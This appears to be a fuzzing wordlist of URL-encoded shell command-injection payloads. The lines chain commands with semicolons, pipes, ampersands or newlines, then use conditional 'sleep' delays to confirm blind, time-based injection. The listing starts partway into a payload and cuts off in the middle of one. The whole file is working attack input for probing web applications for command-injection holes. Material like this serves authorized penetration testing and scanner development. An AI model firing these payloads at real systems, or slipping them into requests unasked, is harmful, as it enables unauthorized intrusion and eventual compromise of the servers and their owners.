D%24%28echo%20YQOLOU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20YQOLOU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20YQOLOU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%7C%20%5B%201%20-ne%20%24%28echo%20GJJXKM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%202%20-ne%20%24%28echo%20GJJXKM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%203%20-ne%20%24%28echo%20GJJXKM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%204%20-ne%20%24%28echo%20GJJXKM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%205%20-ne%20%24%28echo%20GJJXKM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%206%20-ne%20%24%28echo%20GJJXKM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%207%20-ne%20%24%28echo%20GJJXKM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%208%20-ne%20%24%28echo%20GJJXKM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%209%20-ne%20%24%28echo%20GJJXKM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GIKITN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GIKITN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GIKITN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GIKITN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GIKITN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GIKITN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GIKITN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GIKITN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GIKITN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%3B%20str%3D%24%28echo%20YTYKPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YTYKPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YTYKPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YTYKPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YTYKPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YTYKPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YTYKPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YTYKPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YTYKPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%7C%20%5B%201%20-ne%20%24%28echo%20PEFRRD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%202%20-ne%20%24%28echo%20PEFRRD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%203%20-ne%20%24%28echo%20PEFRRD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%204%20-ne%20%24%28echo%20PEFRRD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%205%20-ne%20%24%28echo%20PEFRRD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%206%20-ne%20%24%28echo%20PEFRRD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%207%20-ne%20%24%28echo%20PEFRRD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%208%20-ne%20%24%28echo%20PEFRRD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%209%20-ne%20%24%28echo%20PEFRRD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20SZMRAM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20SZMRAM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20SZMRAM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20SZMRAM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20SZMRAM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20SZMRAM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20SZMRAM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20SZMRAM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20SZMRAM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%0A%20str%3D%24%28echo%20DOIMVY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20DOIMVY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20DOIMVY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20DOIMVY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20DOIMVY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20DOIMVY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20DOIMVY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20DOIMVY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20DOIMVY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20EWCHCT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20EWCHCT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20EWCHCT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20EWCHCT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20EWCHCT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20EWCHCT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20EWCHCT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20EWCHCT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20EWCHCT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%7C%20%5B%201%20-ne%20%24%28echo%20OIYJXA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%202%20-ne%20%24%28echo%20OIYJXA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%203%20-ne%20%24%28echo%20OIYJXA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%204%20-ne%20%24%28echo%20OIYJXA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%205%20-ne%20%24%28echo%20OIYJXA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%206%20-ne%20%24%28echo%20OIYJXA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%207%20-ne%20%24%28echo%20OIYJXA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%208%20-ne%20%24%28echo%20OIYJXA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%209%20-ne%20%24%28echo%20OIYJXA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CJCSGG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CJCSGG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CJCSGG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CJCSGG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CJCSGG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CJCSGG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CJCSGG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CJCSGG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CJCSGG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%0A%20str%3D%24%28echo%20JGUTOJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20JGUTOJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20JGUTOJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20JGUTOJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20JGUTOJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20JGUTOJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20JGUTOJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20JGUTOJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20JGUTOJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%3B%20str%3D%24%28echo%20KUMDME%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KUMDME%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KUMDME%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KUMDME%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KUMDME%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KUMDME%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KUMDME%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KUMDME%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KUMDME%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%7C%20%5B%201%20-ne%20%24%28echo%20YIKKEU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%202%20-ne%20%24%28echo%20YIKKEU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%203%20-ne%20%24%28echo%20YIKKEU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%204%20-ne%20%24%28echo%20YIKKEU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%205%20-ne%20%24%28echo%20YIKKEU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%206%20-ne%20%24%28echo%20YIKKEU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%207%20-ne%20%24%28echo%20YIKKEU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%208%20-ne%20%24%28echo%20YIKKEU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%209%20-ne%20%24%28echo%20YIKKEU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HVSPQM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HVSPQM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HVSPQM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HVSPQM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HVSPQM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HVSPQM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HVSPQM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HVSPQM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HVSPQM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%0A%20str%3D%24%28echo%20EBFNRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20EBFNRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3